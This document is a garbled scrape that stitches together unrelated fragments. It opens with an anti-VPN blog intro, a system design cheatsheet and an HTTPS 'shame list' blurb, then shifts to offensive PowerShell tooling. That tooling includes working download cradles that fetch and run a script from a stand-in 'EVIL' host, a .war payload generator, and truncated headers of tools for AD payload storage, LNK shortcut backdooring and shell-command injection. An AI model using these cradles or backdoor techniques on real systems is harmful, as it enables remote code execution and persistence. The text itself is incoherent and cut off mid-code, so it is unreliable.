SkyN9ne SkyN9ne

Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.

A Russian translation of this article can be found here, contributed by Timur Demin.
A Turkish translation can be found here, contributed by agyild.
There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.

System Design Cheatsheet

Picking the right architecture = Picking the right battles + Managing trade-offs

Basic Steps

Clarify and agree on the scope of the system

User cases (description of sequences of events that, taken together, lead to a system doing something useful)
- Who is going to use it?
- How are they going to use it?

HTTPShame

A shame-list of popular or important websites which have not yet deployed HTTPS certificates by default.

Sites which may involve the transmission of very sensitive data, such as health or banking information, are marked with an ❗ to signal they should deploy HTTPS-by-default as soon as possible. If you are a popular website (such as those on the Alexa Top 500 Global Sites) which finds itself on this list - and you want to be removed - you can visit Let's Encrypt about transitioning to HTTPS. It's easy, free, and will help you learn how to protect your customers/ readers!

List now outdated, removed until further notice.

Q: What is HTTPS?

	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object

	#!/usr/bin/python

	# Code that quickly generates a deployable .war for a PowerShell one-liner

	import zipfile
	import StringIO
	import sys

	def generatePsWar(psCmd, appName):

	Function Invoke-HostFile {
	<#
	.SYNOPSIS

	Hosts a base64 string representation of a binary file or a given
	$FilePath on the specified $Port. Any HTTP request to the given
	host/port will return the binary data of the specified file.

	.PARAMETER Base64File

	Function Start-FileSystemMonitor {
	<#
	.SYNOPSIS

	This function will monitor one or more file paths for any file
	creation, deletion, modification, or renaming events. Data including
	the change type, ACL for the file, etc. is output to the screen or
	a specified -LogFile.

	If -InjectShellCmd is specified, the given command is inserted into

	void TestCopy()
	{
	BOOL cond = FALSE;
	IFileOperation *FileOperation1 = NULL;
	IShellItem isrc = NULL, idst = NULL;
	BIND_OPTS3 bop;
	SHELLEXECUTEINFOW shexec;
	HRESULT r;

	do {

	#Requires -Version 2

	function New-ADPayload {
	<#
	.SYNOPSIS

	Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates
	a one-line launcher.

	Author: @harmj0y

	function Set-LNKBackdoor {
	<#
	.SYNOPSIS

	Backdoors an existing .LNK shortcut to trigger the original binary and a payload specified by
	-ScriptBlock or -Command.

	Author: @harmj0y
	License: BSD 3-Clause
	Required Dependencies: None